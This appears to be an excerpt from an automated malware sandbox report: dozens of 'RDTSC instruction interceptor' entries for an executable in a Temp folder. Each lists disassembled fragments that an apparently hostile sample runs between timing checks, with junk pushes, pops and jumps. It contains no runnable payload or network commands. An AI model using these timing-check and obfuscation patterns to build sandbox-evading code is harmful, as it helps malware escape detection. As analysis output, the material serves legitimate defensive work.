Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AA0F second address: C7AA15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AD0D second address: C7AD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AD15 second address: C7AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B56C second address: C7B579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F34D94219DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B579 second address: C7B57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B57D second address: C7B58F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B58F second address: C7B5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F34D8F44CC3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B5BE second address: C7B5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7BABB second address: C7BABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C112 second address: C7C118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C118 second address: C7C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C11E second address: C7C122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C122 second address: C7C126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7C126 second address: C7C12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F28F second address: C7F29E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F29E second address: C7F2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007F34D94219DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F2B5 second address: C7F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F538 second address: C7F53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F53C second address: C7F55A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F34D8F44CC4h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7F55A second address: C7F55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D5B8 second address: C8D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D6F7 second address: C8D724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F34D94219DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F34D94219E9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D724 second address: C8D73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnc 00007F34D8F44CB6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D73A second address: C8D73F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D73F second address: C8D762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F34D8F44CB6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8D8BD second address: C8D8C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E1D8 second address: C8E1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E1E2 second address: C8E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E1E8 second address: C8E20C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F34D8F44CB6h 0x00000008 jmp 00007F34D8F44CC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8E20C second address: C8E210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C8C88B second address: C8C892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA069E second address: CA06B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA06B1 second address: CA06BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA06BB second address: CA06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F34D94219DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA06CB second address: CA06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA023B second address: CA023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA023F second address: CA0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA0245 second address: CA0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA0251 second address: CA0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA0257 second address: CA025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA376B second address: CA3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA6188 second address: CA6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA6192 second address: CA61A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CA5D09 second address: CA5D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D5E second address: CB3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D8F44CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D6A second address: CB3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D6F second address: CB3D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CB3D75 second address: CB3D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F34D94219DDh 0x0000000e jnl 00007F34D94219D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1089 second address: CC108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC108D second address: CC1091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1091 second address: CC10A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F34D8F44CBEh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC11F2 second address: CC1201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F34D94219D6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1393 second address: CC13C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D8F44CB6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC3h 0x00000013 jmp 00007F34D8F44CC4h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC17BE second address: CC17D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC17D9 second address: CC17EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F34D8F44CBCh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1933 second address: CC1954 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F34D94219DEh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC1954 second address: CC196A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F34D8F44CBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC534A second address: CC535B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC535B second address: CC5363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EA0 second address: CC4EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EA4 second address: CC4EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EA8 second address: CC4EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F34D94219DEh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC4EBE second address: CC4EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC503C second address: CC5070 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jnl 00007F34D94219F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CC8CB5 second address: CC8CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CD2A94 second address: CD2A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CD2A9A second address: CD2AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CE818F second address: CE8194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CE7EFF second address: CE7F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF8F9 second address: CFF8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF8FD second address: CFF91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF91D second address: CFF93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F34D94219F5h 0x0000000b jmp 00007F34D94219E1h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFF93C second address: CFF942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFFBB4 second address: CFFBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: CFFE70 second address: CFFE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D0029E second address: D002DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F34D94219F0h 0x00000008 jmp 00007F34D94219DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F34D94219D8h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D00579 second address: D00590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F34D8F44CC2h 0x0000000b jl 00007F34D8F44CB6h 0x00000011 jc 00007F34D8F44CB6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D03388 second address: D0338C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038C4 second address: D038C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038C9 second address: D038D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F34D94219D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038D4 second address: D038E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F34D8F44CB8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038E6 second address: D038EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D038EB second address: D03946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122DB3ECh], edx 0x00000014 push dword ptr [ebp+122D1FD0h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F34D8F44CB8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jl 00007F34D8F44CBCh 0x0000003a mov edx, dword ptr [ebp+122D3319h] 0x00000040 and edx, dword ptr [ebp+122D33D1h] 0x00000046 push C5BAC5A1h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F34D8F44CBAh 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D06321 second address: D0632C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F34D94219D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: D0632C second address: D06339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F34D8F44CC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A000B second address: 53A0011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0011 second address: 53A0015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0015 second address: 53A0019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0019 second address: 53A00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F34D8F44CC8h 0x0000000e push eax 0x0000000f jmp 00007F34D8F44CBBh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov cx, C8CBh 0x0000001a pushfd 0x0000001b jmp 00007F34D8F44CC0h 0x00000020 sub al, FFFFFFD8h 0x00000023 jmp 00007F34D8F44CBBh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F34D8F44CC4h 0x00000033 sub esi, 3628B638h 0x00000039 jmp 00007F34D8F44CBBh 0x0000003e popfd 0x0000003f call 00007F34D8F44CC8h 0x00000044 mov ecx, 2288B0F1h 0x00000049 pop ecx 0x0000004a popad 0x0000004b pop ebp 0x0000004c pushad 0x0000004d push edi 0x0000004e mov dl, cl 0x00000050 pop edi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushfd 0x00000054 jmp 00007F34D8F44CBEh 0x00000059 add ecx, 521B5AF8h 0x0000005f jmp 00007F34D8F44CBBh 0x00000064 popfd 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390097 second address: 53900DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F34D94219E6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F34D94219E7h 0x00000018 rdtsc
